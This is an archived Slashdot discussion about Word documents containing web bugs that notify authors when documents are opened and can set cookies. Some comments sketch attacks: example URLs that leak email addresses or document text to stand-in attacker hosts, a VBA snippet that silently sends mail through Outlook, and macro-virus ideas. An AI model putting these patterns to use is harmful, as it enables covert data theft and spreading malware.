Microsoft Word Documents That "Phone Home"

ephraim writes "According to The Privacy Foundation, Microsoft Word documents have a 'feature' which allows the documents' creators to place web bugs within the documents that inform the author whenever somebody has opened the document via a web server's logging facilities. This 'feature' can also be used to set and view cookies on the reader's copy of Internet Explorer. The story can be found here. While this might be useful for tracking the distribution of confidential documents, it also raises serious red flags about privacy since most people probably aren't expecting their copy of MSWord to announce their reading habits every time they use it." Props to their CTO Richard M. Smith.

Here is what Microsoft had to say about it (emphasis added)...

Vendor Contact and Response

Microsoft was contacted about this issue on 8/4/00, and again on 8/25/00. They confirmed that Microsoft Word will access the Internet in order to fetch Web images that are linked to in a Word document. They went on to say that Word uses Internet Explorer to fetch images and therefore standard Web browser cookies can be both read and set from inside a Word document. However, the company claims that Word users can mitigate the use of cookies.

Regarding the potential use of Web bugs to track Word documents, Microsoft said that there is no evidence that such activities are occurring.

This would happen with HTML documents too

[donutello]

If I distributed an HTML document which had references to images or other objects on some website, every user opening that HTML document would cause an access to that web site.

Re:This would happen with HTML documents too

[Erasmus+Darwin]

The difference is that embedded image tags within an HTML document are something that someone who's familiar with the technology expects. That's the whole point of a Hyper-Text Markup: it references other documents.

Comparing a Word document retrieving arbitrary objects off the web to an HTML document retrieving arbitrary objects off the web is like comparing a shock from a defective toaster to a shock from sticking a fork in an outlet.

Re:This would happen with HTML documents too

[(void*)]

The difference being that if you looked in the HTML source, you could find the offending link and fix it so that it does not reference the page. You could download it, and package it together with the HTML, modifying the reference so that other people will not hit the link. With the binary file format of Word, it's going to be hard to do this.

Re:This would happen with HTML documents too

[iamriley]

All M$ apps are sufferring from the ultimate bloat--they're merging into one unified application based on XML.

Soon there won't be a difference between Microsoft Word and Internet Explorer.

Re:This would happen with HTML documents too

[Tau+Zero]

If Word had a proper security sandbox setup, it could be extended to privacy as well. Neither viruses nor HREFs should cause accesses to anything without permission of the user. Bye-bye, web bug.

Of course, Microsoft doesn't believe in security models.
--

Re:This would happen with HTML documents too

[Alternity]

The main difference is that it's quite easy to see the source of an HTML document and so to spot the webbug.

Re:This would happen with HTML documents too

[Shadowkiller]

This may be totally offtopic, but I think this troll may be onto something. What if someone were to embed the DeCSS code into a Word macro virus? Just imagine the possibilities!

Each time someone opens an infected document, it spreads copies the code into all .doc files on the hard drive. Given all the mystery bloat that typically accompanies Word documents anyway, I doubt anyone would even notice.

As an added bonus, the Outlook-enhanced version could also send copies to 50 people in the address book!

Before long, if it circulates far enough, we might even be getting copies of DeCSS which were inadvertantly sent directly MPAA themselves! Oh, sweet irony.

Re:This would happen with HTML documents too

[JCCyC]

Nonsense. While it may be true for MS shite, nothing on my system gets sent to the internet without my explicit involvement. Its just common sense.

DMCA has outlawed common sense. Don't you read the news? Expect this sort of thing to be mandatory, i.e. you are not allowed to fix MS Word or Media Player or WinZip or WinAmp or whatever for not snitching (not even by putting a firewall machine between you and the 'Net), because that'll be a violation of the DMCA.

Re:This would happen with HTML documents too

[sparkz]

Yeah; all this sounds like, is "if I request an object from the web, that request will be logged by the server I get it from&quot.

That's the same whether it's an HTML, MSWord, RTF document, or an image, executable binary, whatever. Similarly, if I download something from an FTP server, that will be logged.

The only thing I can think that could be different is if I save the document locally, and it still contains an egg. So what? Surely the owner of the document is entitled to do that if they want?

Re:This would happen with HTML documents too

[Captain+Pillbug]

Using a Microsoft product is like sticking a fork in an outlet. That MSWord should behave this way is revolting but entirely "par for the course".

Re:This would happen with HTML documents too

[harhar]

this can be done with java-script and pdf documents and adobe's pdf player also, i can dig up the code tonight if anyone wants to see. I saw it in a Mactech magazine months ago.

$var = STDIN;
$var =~ s/\\$//;

Re:This would happen with HTML documents too

[zeugma-amp]

The difference being that if you looked in the HTML source, you could find the offending link and fix it so that it does not reference the page. You could download it, and package it together with the HTML, modifying the reference so that other people will not hit the link. With the binary file format of Word, it's going to be hard to do this.

Many moons ago, while using WordPerfect 5 (or so), I found that I really loved the "reveal codes" feature. It actually made my initial foray into HTML much easier because I was already somewhat familiar with the concept. MS hides all that stuff and, to the best of my knowledge, doesn't give you the option to view it in simple text mode with formatting marks displayed. It is typical of their entire philosophy of letting users see as little as absolutely necessary of what they actually need to properly format documents.

This is one reason their exported HTML looks so horrible. I can't tell you how many times I've seen "<b>&lt/b>" in converted HTML. It also makes the docs needlessly larger than they need to be.

Z

Re:This would happen with HTML documents too

[jawtheshark]

God bless the good old Alt-F4!

I had it all the time on too. It made everything easier and the first time I had to use Word I was so confused because I missed the tags. It was soo much easier to clean up a mess you made in the layout, instead of pressing "Undo" a dozen of times and hoping not to lose too much stuff (read: the "Word" way)
The good old time will never come back :-(

Re:This would happen with HTML documents too

[grahamm]

Since when has it been mandatory for a PC running Word to be internet connected?

Re:This would happen with HTML documents too

[Zigg]

So this isn't an issue, eh? Consider an e-mail with an IMG tag embedded that runs to a CGI. A parameter is given for your e-mail address (i.e. IMG SRC="http://bad-guys.example.com/logo?email=steve_ g_parker@SPAM_ME.hotmail.com">). Said CGI offloads a cookie to your machine.

Now bad-guys.example.com knows who you are and can track you all over their site.

Not sounding so innocent now, is it?

Re:This would happen with HTML documents too

[alleria]

Take source of ILOVEYOU, modify to include DeCSS source at the bottom, with font color as white. Nobody notices, except that their printer spits out a couplea extra blank pages at the end of every document...

Should be reasonably easy, you'd think.

Re:This would happen with HTML documents too

[turgon]

The article states "While this might be useful for tracking the distribution of confidential documents, it also raises serious red flags about privacy since most people probably aren't expecting their copy of MSWord to announce their reading habits every time they use it."

Oh, please. Reading *habits*? It would announce that you've read THIS ONE DOCUMENT, and when. It wouldn't be announcing the fact that I like to read Larry Niven novels.

Embedding web bugs in a document sucks, but let's be clear about the dangers.

Re:This would happen with HTML documents too

[JCCyC]

It isn't... NOW. As Internet connectivity (at least on a daily basis) becomes the norm, pay-per-use becomes more viable. It seems some people will never be content unless everybody owes them an infinite amount of money.

Re:This would happen with HTML documents too

[logiceight]

How do we know this isn't already happening? :)

Re:This would happen with HTML documents too

[carrier+lost]

I believe the point can be summed in one word:

volition

MjM

Well, that makes me feel better.

[tycage]

Regarding the potential use of Web bugs to track Word documents, Microsoft said that there is no evidence that such activities are occurring.

Since it's not happening now, it couldn't possibly start happening later. I've never seen a problem with a MicroSoft product be exploited weeks, months, even years after it was released. Now I'll be able to sleep at night.

--Ty

Re:Well, that makes me feel better.

[dstanfor]

Well, Microsoft knows that others aren't using Web bugs to track Word documents, because they've set it up so that they can track all Word documents with Web bugs.

It was part of the fine print in the User Agreement that says " All content created with Microsoft Word belongs to Microsoft, and will be tracked accordingly."

Re:Well, that makes me feel better.

[unitron]

I just had a really unpleasant thought about the true origin and composition of that "manna from heaven".

Re:Well, that makes me feel better.

[anonymous+cowerd]

My Jehovah...My Jehovah

Your Jehovah? You mean there's more than one, you polytheist, you pagan, you? Sheesh, these blasphemers, these days!

Yours WDK - WKiernan@concentric.net

...measuring my Earth under my Sun...

Re:Well, that makes me feel better.

[carrier+lost]

All hail Mazda!

Um.

[FascDot+Killed+My+Pr]

So let me get this straight. Word can:

-Run arbitrary macros
-Access your hardware
-Access the Internet
-Download and upload data
-Set and send cookies

I'm beginning to think Microsoft is right: They don't know the difference between an app and an OS.

Just to spell it all out: A Word macro virus now has the ability to, say, infect all your existing Word files such that when you open one of those files the contents are sent to a named address on the Internet. Goodbye confidential documents!
--

Re:Um.

[thelonius]

no, i don't think word can upload data. the way the tracking works is to monitor requests for download by reading the web server logs.
a word macro virus could infect all your existing word files so that they would all have web bugs. this would allow the virus writer to presumably know when anyone read your files, but the usefulness of that ability escapes me.

Re:Um.

[matman]

On the contrary, if a document can access a url, a macro can build a URL containing the content of the document (at least, it could do it in parts, as a long document wouldnt probably fit in a 'get' method) Think, http://badass.hacked.com/recordfiles.cgi?from=your host.yourdomain.com&title=Confidential&p art=1&content=the%20first%20part%20of%20your%20doc ument

have the macro embed like, 50 of these in image tags, and bingo, the thing just uploaded your document to an attackers system. It'd be even easier to do if the macro has the ability to do post methods.

Re:Um.

[Enzondio]

no, i don't think word can upload data. the way the tracking works is to monitor requests for download by reading the web server logs. a word macro virus could infect all your existing word files so that they would all have web bugs. this would allow the virus writer to presumably know when anyone read your files, but the usefulness of that ability escapes me.

This is slightly off topic but screw it. This can be done rather simply, although it doesn't relate to these so called web bugs. Assuming that we've gotten past the "This document contains macros" warning it's trivial to send out data over the Internet. The easiest way is to use Outlook.

Set App = CreateObject("Outlook.Application")
Set Mes = App.CreateItem(olMailItem)
Mes.Subject = "Blah blah blah"
Mes.To = "someone@somewhere.com"
Mes.Send

This will send the E-mail without the user ever knowing, with a few more lines it could also be deleted from the Sent Items folder. And of course it'd be pretty easy to attach files using this method. Of course it assumes that they actually USE Outlook, but considering the rate at which Melissa and ILOVEYOU spread I don't really think that's much of an issue.

Re:Um.

[Zagadka]

no, i don't think word can upload data.

Word (via IE) make a request to a web server. If that request can be manipulated, then you can encode the data to upload in the request itself. For example:

http://worddocslurper.net/cg-bin/dot.gif?fname=a ccounts.doc&chunk=0&data=Summary+of+my+ban k+accounts%3A+%0c%0aBank+of+America%3A+%2448.96

For someone who knew Word macros, this probably wouldn't be all that hard.

Re:Um.

[robin]

If you can work out who reads a file that you sent into the bowels of an organisation, you can figure out who to send your `I Love You' trojan, with its `send me all of the spreadsheets on your machine' payload. Imagine delivering something attractive to the finance department, or to the HR department. There's a lot of value that can be generated from this kind of social engineering (and, conversely, a lot of damage that can be caused). Simply getting information on what browser the people on the inside of the firewall are using might be interesting.
--

Re:Um.

[rlk]

Suppose the Word virus were to, say, search for a particular string in each file on your disk, and if it finds it, insert a URL containing that string, or the context surrounding it. Then whenever someone opens that document, the URL gets sent to the hostile server. There's a limit of about 1K (I think) in an actual URL, but that still allows for a fair bit of data. If multiple web bugs are embedded, of course, it's possible to send across even more data.
Remember that the web bug doesn't actually have to correspond to a real file on the hostile server; it just has to be something that the hostile server understands.

Re:Um.

[Myddrin]

Easier than that. It can the word macro
could just access the internet capabilities of
IE3.0 and above and ftp a file where-ever you
want.

Since it's known that IE is installed on almost
every machine (and that it's an activex component)
makes it just sooooo easy to say upload an entire
harddrive to a given site....

Or barring that, I'm sure there's some activex
exploit that could be used to install the internet
activex control that ships with vb(especially since activex controls signed by microsoft are automatically trusted until the user says they aren't anymore... then the sky is the limit!

Re:Um.

[NecroPuppy]

And I don't even want to think about embedded scripts in the Word-link...

Too late, thought about it...

Would it be possible under this system to have a linked script that, say, erases a hard drive? My mailer (supposedly) blocks scripts from running from an e-mail, but there isn't any way I can see it finding a linked script embeded in a zipped Word doc...

Makes me glad I use WordPerfect at home....

NecroPuppy

Re:Um.

[Nephrite]

So let me get this straight. Word can:

-Run arbitrary macros
-Access your hardware
-Access the Internet
-Download and upload data
-Set and send cookies

...and despite all of above millions of lusers will continue using M$ products no matter what

Re:Um.

[Old+Wolf]

It's you that can't tell the difference between the app and the OS. I can also do all of the things you mention in vi. To see for yourself, fire up vi and type this:

!!wget http://www.slashdot.org/ 2>&1 >/dev/null ; cat index.html

voila, web browsing from your text editor.

The process involved is conceptually the same as what you are talking about in Windows, except that the call to the other application is made using COM rather than invoking a new shell and then running an executable. If you had a vi macro to do the above command, then you would have the same situation as in Windows.

New virus already in mind...

[Gaewyn+L+Knight]

Well so you have your VBS virus write a web bug into every created document. In this is the registry settings that hold your password stored in a cookie and anytime you open the document you have "sent" your passwords to the bug writer.

Can we say hole the size of ... well the size of Windows.... :)

Great news

It's nice to see Slashdot finally giving Microsoft some credit for their innovations. Usually you see articles about "Microsoft is screwing us" and "Boo Microsoft", but for once we're seeing a neutral description of a great Microsoft feature.

Good job, Slashdot! Keep up the good work!

No big deal

[rongen]

This could be accomplished by embedding an "image tag" that uses a script as it's image source, I expect? This is really no different than embedding one in a web page and is not really something I would worry about (any more than I worry about this happening with HTML).

I haven't used Word in a really long time... Is it trivial to see where images are coming from or is there some way to prevent people from seeing thier origin?

It is easy to make a webbug visible by examining the info for the HTML page (or the source) but by then you have downloaded the HTML and it's too late :) so how is this MS thing any worse, or different?

Just curious...

--8<--

This isn't much different than Web Pages already..

[LionKimbro]

We shouldn't be too surprised; Web Pages are already like this.

I remember the surprise that a friend of mine showed when I showed her "Apache Logs".

Her first reply was, "HOW CAN I MAKE IT NOT DO THAT?!?"

(This is a particularly paranoid friend of mine.)

General rule of thumb: If you're doing something on the Internet, you're being logged.

Do something useful: read "Transparent Society" and/or work on making yourself a more tolerant person, rather than fretting about your "privacy" (unaccountability).

But only in a web browser

[FascDot+Killed+My+Pr]

People expect a web browser to be network-savvy. Clearly webbugs in a browser are bad, but at least you think to check there. But web bugs in a word processor??
--

How hard is it

[Rurik]

On the topic of Word: How hard is it to just have a simple word processor package?
WTF does Microsoft have to insist on throwing every single bell and whistle that the 1%'ers want into the mix. People want a small, reliable processor to type up homework and reports.
They went on the right track with their installation process, which splits up Word into it's vital components, and lets you choose which to install. But what good is that if it still installs components that you don't want, and don't trust on your machine (such as the topic)?

Re:How hard is it

[Zan+Thrax]

WTF does Microsoft have to insist on throwing every single bell and whistle that the 1%'ers want into the mix?

Because those 1%ers are the ones who buy the upgrade as soon as its available, and thus start the cycle of forcing others to upgrade to stay compatible with everyone else.

Re:How hard is it

[askheaves]

Not everyone just wants a simple wordprocessor. If that's all you need, Notepad works rather well (or vi on a freeer system). High school students need to write reports. College students need to write reports, create lab reports (embedding charts, diagrams, etc) and other larger projects. Professionals need to create daily solutions (embedding diagrams, weblinks, using standard templates, using proofing tools on drafts, keeping version control, creating traceable requirement and design documents... the list goes on ad infinitum).

Who wants to see Microsoft create a slew of about 150 products that do completely different things? I think that it's great that there are just a few flavors of productivity tools to choose from. They seem to be tailored pretty well to the needs of individuals, small businesses, enterprises, and us piraters that have the premium edition.

The method of accomplishing such a comprehensive system like this is openness. Do you have any idea how easy it is to write an add-in for Outlook? There was an article in the July 2000 VCDJ (no link available) that showed very quickly how to create a full-featured add-in for Outlook. It allowed hooking into all sorts of notifications, adding buttons, getting to mail, etc... basically, really slick stuff.

The price of this openness is that little exploits like this fall through the cracks. It's all a large balancing act where you decide what is necessary, and what risks are acceptable.

Re:How hard is it

[Policetape]

Of course everyone wants a simple word processor. They just want it to do exactly what they need it for. Unfortunately not everyone needs it for the same exact little things. So if Microsoft can add the little features that everyone wants then everyone will buy their product.
If you keep adding 1% then it will eventually add up to a whole lot of people. (Note: It will not add up to 100% becaue there is a % of people who will use other products)
The reason that Word is so poplular is because it can do all these things.

Re:How hard is it

[egburr]

Not everyone just wants a simple wordprocessor. If that's all you need, Notepad works rather well (or vi on a freeer system).

Those are not word processors. Those are text editors. Now, WordPad is a very limited, relatively simple word processor. Text editors let you edit the text. Word Processors let you format the text.

Edward Burr

Re:How hard is it

[Zagadka]

College students need to write reports, create lab reports (embedding charts, diagrams, etc) and other larger projects.

In science and mathemetics, at least, this is usually accomplished with LaTeX. Diagrams are done with any tool that can generate EPS, like xfig or Graphviz. MS Word's equation editor sucks quite badly.

And there's a big difference between "you can embed diagrams" and "you can catch a virus". Yes, an exploit here or there is understandable. MS has made it quite clear that they're either clueless or careless when it comes to security, considering the sheer number and severity of exploits in their products. And their excuse that "there is no evidence that such activities are occurring" is even more unsettling. It reveals a whole attitude towards security akin to "the bank vault is secure until someone steals all the money".

Re:How hard is it

[kaphka]

On the topic of Word: How hard is it to just have a simple word processor package?

When you're using your hypothetical "simple word processor package", do you ever plan to use charts, or tables, or graphics? You probably do. Now, there are two ways that developers can add that sort of feature. They can write a complete spreadsheet/chart/graphics package from scratch, and #include it in the word processor... or they can create a mechanism that allows objects from other programs to be embedded in your document.

Regardless of the security implications, no sane programmer would chose the former method. It wastes time, it makes the UI inconsistent, it bloats the code, and it creates many more opportunities for bugs. Even if those limitations aren't a problem, it would still never happen, because good programmers would sooner quit than be forced to cut-and-paste code (instead of using shared libraries.)

Microsof chose the latter option. All "active documents" can contain elements from any other COM object provider. The "downside" of this is that Office programs are now "too flexible" for many Slashdot types. IMHO, for the reasons above, I think that this is a fair trade-off.

Re:How hard is it

[Master+of+Kode+Fu]

That's why EMACs is often considered short for "Eight Megs* And Constant Swapping."

* Of course, this was when RAM sizes were much, much smaller than today...

Re:How hard is it

[Octos]

Try AbiWord (www.abisource.com). It's basic and open source. It runs on windows and Linux and BeOS and more. It saves as text, RTF, or it's own format that is XML-based. It also reads Word97 docs.

Re:How hard is it

[baka_boy]

Microsoft, like any software design group, has the right to make a design choice favoring code reusability over security. In my opinion, though, they've screwed up here by not making clear to their users the potential implications of a choice made when designing the application. The "user friendly" interface and widespread distribution of Microsoft productivity applications contributes to their appearance of being "safe", while the flexibility of the components makes them very powerful.

The average user of MS Office knows their way around the interface, and may even be able to throw together a few quick-and-dirty macros, but they are by no means an experienced object-oriented programmer, or a distributed systems designer. They will not expect to have to check every Word processing document they receive for potential security risks; nor will they automatically run any filtering or TCP/IP monitoring software. Hence, there will continue to be millions of computers comprimised to attackers on a regular basis.

I have little symphathy for system administrators who fail to take basic precautions like changing default passwords or disabling unneeded services -- that's their job, and they should know better. However, I don't expect the same level of dilligence from an inexperienced user who's trying to type view a business letter sent to them from outside the office. Microsoft distributes even their "basic" productivity applications with all the functionality of a basic operating system, makes that power easy to harness (for whatever purpose), and demonstrates little more to their average user than how easy it makes dragging and dropping a spreadsheet chart into a business report. That's irresposible and misleading.

Re:How hard is it

[FFFish]

People want *professional* level tools, even when they're not professionals.

JASC Paintshop Pro is overkill for most people's graphics needs. It sells for what, a hundred bucks? Yet Photoshop is pirated like mad -- *not* because it's better, but because it's considered professional-grade. Joe Blow will never use 1/3rd its features... but it's what he wants.

The same applies for wordprocessors.

Unfortunately, what most people don't seem to realize is that there's a whole level of professionalism that's quite apart from the level of marketing.

One thing that frustrates me is that so many products are de-facto standard not because they are superior, but because they were well-marketed.

Corel has a suite of applications that is superior to the competition in almost every way:
* by most accounts, CorelDraw is better than Illustrator, Freehand and PageMaker.
* by many accounts, WordPerfect is superior to MS-Word.
* by all accounts, Ventura Publisher is superior to Quark and FrameMaker.

PhotoPaint versus Photoshop seems to be the only upset to Corel's domination on the basis of functionality and ease-of-use.

Yet Corel is sinking like a stone, while these other inferior products continue to maintain de-facto status.

It bothers me, 'cause I *hate* using inferior tools just because they're popular!

Er, anyway, rant off. My point is: people don't want simple or minimalist. They want *professional* tools. Even if they are overkill.


--

Re:How hard is it

[quantum+bit]

I definately agree on the Corel vs. Adboe argument here! The only exception is that I prefer PhotoPaint over Photoshop any day for professional-level image manipulation. They both have about the same level of power (and Corel seems to jump ahead in their new releases faster), but the PhotoPaint user interface is *SO* much nicer. Photoshop always reminds me of old MacOS applications... (maybe because that's where it came from). I never could understand why it's so popular.

Of course there's always GIMP, but how could I get away with running Linux at work? ;)

Re:How hard is it

[um...+Lucas]

Then use WordPad... It's free. It's functional. And it has none of the annoyances of word, unless you're one of those 1%'ers... Which most everyone is, really. As much as you don't want to be, if you use Word, odds are that there's some esoteric feature that you use that other people don't quite consider part of a "normal" word processor.

Re:How hard is it

[Quintin+Stone]

But who in their right mind uses EMACS?

Re:How hard is it

[psyfir]

I definitely agree with this statement. We have to use Word at work, and often I have had to compose in WordPerfect and import it into Word because I just couldn't get Word to do it correctly. (Tables is a biggie here.) It's unfortunate that so many companies standardize on Word because it's shoved down their throats by the Micro$oft, not because it's a better product.

I characterize WordPerfect as the Ultimate Front-End for Word.

Re:How hard is it

[Metrol]

The price of this openness is that little exploits like this fall through the cracks.

No. The price of this openness are viruses like ILOVEYOU which did nothing at all but utilize the tools that Microsoft provided.

I'll grant you, reusing components and interlinking apps really is a good idea. At the same time, some level of consideration needs to be paid to even the most basic level of security. Should a word processor, or any other Office app, be given the ability to alter the OS without any restrictions? Maybe I'm lacking some imagination here, but I can't think of a single good reason why Excel should be allowed to alter ANY entry in my registry.

Speaking of registry probs, more interesting stuff on this in a later post by me.

Re:How hard is it

[mondamay]

WTF does Microsoft have to insist on throwing every single bell and whistle that the 1%'ers want into the mix.

I think the reason has to do with their use of components and COM. If you read that interview with Miguel (something about "Unix Sucks"), you'll recall that he praised MS for designing components that can be added to an application with little overhead. So adding all the junk to Word is so simple they probably couldn't resist.

Re:How hard is it

[DGregory]

Hear, hear. I just set up my cousin's computer (hand me down from her father) so that she and her 78 yr old roommate could use AOL for e-mail. These are people who didn't know what a floppy disk was or that computers write your password in as stars. I put Wordpad, Solitaire, Hearts, and AOL on the desktop, explained that you click on the icon twice to open it, click on the x in the corner to close it. She got a full copy of an older edition of Microsoft Office, but I think she'll be happy with Wordpad for awhile. She writes faster with her hand than on a keyboard anyways.

Re:How hard is it

[compwiz3688]

How hard is it to patch up Word/Excel, whatnot, so that all macros only affect within the document?!?! Why do those macros need to get outside of the documents?!?! I just can't stand it!

Oh wait, that's exactly why the only Microsoft product on my machine is the OS... Then again, who knows what they have done with the OS as well?!

---
Mouse location changed. You must restart Windows for the changes to take effect.

Re:How hard is it

[Sloppy]

WTF does Microsoft have to insist on throwing every single bell and whistle that the 1%'ers want into the mix.

To get more bullet points in the reviews. "Internet" is a hot word. If your product isn't "Internet enabled" then your buzzword count is going to be lower than your competitor's.

People want a small, reliable processor to type up homework and reports.

Most people don't make purchasing decisions based on what they want. Read up on marketing psychology some time. It's depressing.

---

Re:How hard is it

[fsck]

Check out Vigor and see just what Clippy's evil cousin is up to.

http://www.red-bean.com/~joelh/vigor/

Haven't we seen something like this before?

[jesser]

This sounds pretty familiar. It's only slightly more disturbing to me that MSWord has this hole than that Outlook Express, Netscape, and Mozilla have it.

By the way, this exploit hasn't been fixed in Mozilla's mail/news client yet.
Bugzilla bug 28327: "No server hits at HTML mailnews reading - privacy" (major, M18, nsbeta3-)

--

Exactly

[GMontag]

If I distributed an HTML document which had references to images or other objects on some website, every user opening that HTML document would cause an access to that web site.

And if you read *any* document with a ref to an outside object (like a one pixel .jpg) with *anything* that is web aware the exact same thing will happen.

However, if you read the document in Wordpad or some other text only program you can avoid the effect. Makes for some pesky reading around markup and junk, but you will see the refrences to the web too.

Visit DC2600

Re:Exactly

[British]

You could always view the file in another app, like Quick View Plus. That program reads Word documents but doesn't access the Internet.

Re:Innovative Solution

[excesspwr]

Dont forget Excel and the rest of em...

What I'd like to know is

[ch-chuck]

what are those curious little dots that appear and disappear on /. as the page loads, like right above the banner ads?? Are we being web-bugged even as we talk about it?? :))

However, looking at page source it looks like something to do w/ pagecount, but you got us wondering about any image w/ WIDTH=1 HEIGHT=1

Re:What I'd like to know is

[jamiemccarthy]

We get this every so often. They're pagecounters, not web bugs. My traditional response is here.

Jamie McCarthy

Re:What I'd like to know is

[harmonica]

In addition to the other response (image == web counter), 1 x 1 pixel images are also used for web page layout. It is (or was, at least) the only way to get certain things (like precise alignment) done in HTML. IIRC, CSS solves at least some of the problems.

Re:What I'd like to know is

[tealover]

I don't understand this. Why do you need to count pages based on the image? You have the damn web logs !! Why can't you just analyze the web logs? Your traditional response is lacking.

I'm sure you won't respond to this because you never respond with anything more than your obligatory response.

Re:What I'd like to know is

[Ravagin]

CSS does solve a lot of these problems; web design is much easier with CSS. Or rather, it would be if you could trust every browser to render it the same way (not to mention implement the standards right). [/rant][/ot]

Anyway, we only see these little graphics on /. because the browser frames the image before it has finished loading it, and then only because of the black background. In a white Word document... well, there's no way to tell.
-J

Re:What I'd like to know is

[great+throwdini]

In addition to the other response (image == web counter), 1 x 1 pixel images are also used for web page layout. It is (or was, at least) the only way to get certain things (like precise alignment) done in HTML.

Typical tired response is that images of such dimensions for pixel-perfect placement is usually (these days) done to get around Netscape not honoring table cell height and widths for cells lacking content -- workaround here is to use the proprietary Netscape SPACER tag in place of images for pixel-perfect layout.

Tired response #2 is that this is not quite the same thing as a 1x1 buglet, as the dimensions involved are those *represented in the HTML* and not the *actual dimensions* of the linked image. In order to know the latter, the client/recipient would have to download the image in question -- instant logging activity. To effectively block buglets in advance, you would have to know that it is a buglet (1x1 dimensions) by looking at the markup HEIGHT and WIDTH hints and guessing that the image(s) in question are buglets before making the request for them.

Unless the pixel-perfect layout you seek is in nice 1x1 chunks -- not a 1x1 transparent GIF stretched using HEIGHT and WIDTH to arbitrary dimensions -- the level of identity between 1x1 web bugs and your general purpose 1x1 shim image cannot be ascertained without requesting the image and verifying its dimensions.

Of course, the web bug functionality is probably better served by using a lightweight, "real" image (for example, a closing horizontal rule or company logo) and not something as obvious as a 1x1 graphic pasted on to the end of a document, page, or HTML mailing

Re:What I'd like to know is

[Tarnar]

Gee.. Perhaps because images.slashdot.org isn't slashdot.org? It makes analysis of the weblogs easier if you were to shut up and think . Consider the following:

The crew wants to count the page hits. How can you do that? Every time a main page is generated by the Perl? Bzzt, that doesn't work, way too expensive. This place serves more pages/min then I'd ever care to count, and I damn well wouldn't want a script counting it for me every time it's used.

The main page is dynamic too, so you can never be sure how many images will be loaded, so there goes analysis through that means.

Beyond that, just counting the number of hits against the '/' isn't accurate because of incomplete page loads, etc. If you put a small image in there, chances become that if that image is loaded, the rest of the page was too.

Bang, you can suddenly count, far more accurately, the total number of completed page loads. It's a totally controlled variable. It is appended to the logs by the web server, not by some script. What could be better?

Now, this is all speculation, but I put this together in my head after no less then 5 minutes of thinking. Maybe you should try that too. Besides which, they are images loaded from /.'s servers, so how could they possibly be malicious?? It's their page. If they want to put 1x1 images after every third word, it's their perogative to do so.

So even if they have no reason to be there, that's no reason, not a bad reason. Logically, there can't be a bad reason.

Re:What I'd like to know is

[tealover]

bullshit.

Malda has admitted that those "web bugs" are there at Andover's behest. I bet the slashdot crew isn't even administering tht box. Who the hell knows what the Andover people are doing.

Just because you're a willing lemming, don't assume that the rest of us are. All I want is explanation from slashot. Not some flippant response from Jamie. And certaintly not a response from a 2 bit bum like you.

Re:What I'd like to know is

[Tarnar]

Malda has admitted that those "web bugs" are there at Andover's behest. I bet the slashdot crew isn't even administering tht box. Who the hell knows what the Andover people are doing.

Link please, or I'll be forced to call bullshit on you. Besides which, do you honestly have a better explination then me? You can't call it a 'web bug' because the definition of a 'web bug' is something that is stored on a different site then the page in question.

By your logic, any webpage with a 'counter image' or any image whatsoever has 'web bugs' in it. As I said, if I was managing /., that would be the smartest way to keep a webcounter. A totally controlled variable that can be easily grepped out of the logs.

And look, I managed to make a coherent argument without resorting to name-calling. You still have yet to do that. Sod off.

Re:What I'd like to know is

[tealover]

Here's your link. It was actually by Hemos.

the definition of a 'web bug' is something that is stored on a different site then the page in question.

Says who? Some so-called "expert". First of all, the term "web bug" is stupid. Anything that allows tracking is suspect in my book. I don't care what server it happens on. All I care is who adminsters the server and what they do with the data.

if I was managing /., that would be the smartest way to keep a webcounter. A totally controlled variable that can be easily grepped out of the logs.

That's your opinion. I disagree.

And look, I managed to make a coherent argument without resorting to name-calling. You still have yet to do that. Sod off.

Too tough for you in here? There are other, nicer forums for you.

Re:What I'd like to know is

[Tarnar]

Well, the link through the link didn't work, but I'll take the quote at face value. Regardless though, this still takes us back to square one.

And actually, you have what you were whining about in your earlier posts. That was an explination by the Slashdot crew, congratulations, you have proven exactly nothing.

Anything that allows tracking is suspect in my book.

You should probably get the hell off the Internet then. Websites, FTP sites, IRC servers, NNTP servers, they almost all track IP usage. You don't want privacy, you want unaccountability. I mean, yeah, your argument would hold up if those were Doubleclick webbugs that were tracking you from site-to-site but they aren't. They're a local image being loaded on the page.

I still am yet to understand what the basis behind your argument is. You've gotten your explination from Slashdot. You know that your IP is being logged regardless of the presence of that 1x1 GIF.

If, despite all this, you still have a problem with a local GIF on a local server, then email Andover and ask for their privacy policy. You told me to find another forum, maybe you should consider taking yourself to another one as well. If you can't trust Andover and Slashdot, why the hell are you still here, whining?

Not just the logging, though

[FascDot+Killed+My+Pr]

The logging is bad enough (just because HTML does it doesn't make it OK). But combine that with the already known scripting "features" of Word and you have a recipe for disaster. Everyone who has Word installed has a generalized scriptable app open to the Internet. That's a big problem.
--

Re:Not just the logging, though

[STSeer]

HTML has scripting too, and even java

Preventing this

[FIGJAM]

When I am in Vindoz I use ZoneAlarm as a firewall which asks me if I want an application to access the Internet when an attempt is made. I have never had any Office component attempt this but I like knowing if and when Word or anything else tries...

Re:Preventing this

[the-banker]

And you would never know if word tried, since it is the Internet Explorer compnent accessing the net, which I am sure you have granted access. Being a "necessary component of the OS" (their words, not mine) it will always be available, and chances are your firewall will never pick it up.

Re:Preventing this

[indiigo]

That wouldn't work. You've most likely already had IE set up to work which word uses already. ZOne alarm would just see it as another IE request. Unless you are really strict, which I doubt, because Zone ALarm can get really really annoying

Re:Preventing this

[stg]

And you would never know if word tried, since it is the Internet Explorer compnent accessing the net, which I am sure you have granted access. Being a "necessary component of the OS" (their words, not mine) it will always be available, and chances are your firewall will never pick it up.

Have you tested it? I just did, and on Word 97, WINWORD.EXE was the process requesting net access. On ZoneAlarm, you get a question if you want to let it access the net (yeah, right).

That's probably because the IE functions are used as an in-process OLE server, thus the process requesting access is Word, not IE.

Re:Innovative Solution

[dattaway]

Four words: Don't use Microsoft Word.

That doesn't bode well with Bill Gates' World Domination Plan (tm).

Re:This isn't much different than Web Pages alread

[phil+reed]

Except that people don't expect word processing documents to be like web pages.

Has anybody checked to see if the same thing happens in Excel?


...phil

And of course HTML emails

[zlite]

And they're *not* viewed in a web browser. Indeed, it's a good way to get an "opened" receipt when you send email (even if they choose not to acknowledge the usual "reciept requested" flag): embed a graphic from your own site and their client will automatically fetch it when they open the message. Cookies, too.

Clever, but not new. Why the big MSFT-is-evil hype about this?

Re:And of course HTML emails

[david+duncan+scott]

One of the reasons I don't use HTML mail readers...

Re:And of course HTML emails

[Rude+Turnip]

This is why I like Mail-It for BeOS. By default, all messages are shown as plain text, even the HTML tags are visible. If you really want to see a message as HTML formatted, then you can change the "view" to HTML.

To kick out the web bugs, just view the message as plain text and edit out any suspicious tags.

Re:And of course HTML emails

[Tackhead]

